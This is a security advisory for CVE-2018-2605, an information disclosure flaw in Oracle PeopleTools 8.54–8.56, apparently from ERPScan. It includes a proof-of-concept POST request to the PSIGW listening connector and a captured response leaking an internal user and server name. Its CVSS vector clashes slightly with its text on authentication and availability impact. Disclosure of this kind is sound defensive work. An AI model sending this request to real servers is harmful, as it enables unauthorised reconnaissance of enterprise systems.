Application: Oracle PeopleSoft **Versions Affected:**Oracle PeopleTools 8.54 – 8.56 Vendor:Oracle **Bugs:**Information Disclosure **Reported:**15.06.2017 **Vendor response:**16.06.2017 **Date of Public Advisory:**17.01.2018 **Reference: **Oracle CPU January 2018 Authors: Dmitri Iudin aka @ret5et (ERPScan)
Class: Information Disclosure
Risk: Medium
Impact: Sensitive data may be exposed to attackers
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-2605
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | Low (L) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | High (H) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | High (H) |
A remote unauthenticated attacker can get a PIA user and FQDN PeopleSoft server name via trivial POST request.
Oracle PeopleTools: 8.54
Oracle PeopleTools: 8.55
Oracle PeopleTools: 8.56
To correct this vulnerability, implement Oracle CPU January 2018
POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector Content-Type: application/json
1
2
|
POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector
Content-Type: application/json
—|—
-- response – 200 OK Date: Fri, 16 Jun 2017 11:34:07 GMT Content-Length: 675 Content-Type: text/plain; charset=UTF-8 Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin <--!!! INFORMATION DISCLOSE Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT) Mime-Version: 1.0 Content-Type: multipart/related; boundary=“----=_Part_95_86951755.1497612847564” Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message ------=_Part_95_86951755.1497612847564 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Content-Disposition: inline Content-ID: IBInfo <?xml version=“1.0”?>2015810408Integration Gateway Error ------=_Part_95_86951755.1497612847564–
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
-- response --
200 OK
Date: Fri, 16 Jun 2017 11:34:07 GMT
Content-Length: 675
Content-Type: text/plain; charset=UTF-8
Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin <--!!! INFORMATION DISCLOSE
Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT)
Mime-Version: 1.0
Content-Type: multipart/related;
boundary=“----=_Part_95_86951755.1497612847564”
Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message
------=_Part_95_86951755.1497612847564
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
Content-ID: IBInfo
<?xml version=“1.0”?>2015810408Integration Gateway Error
------=_Part_95_86951755.1497612847564--
—|—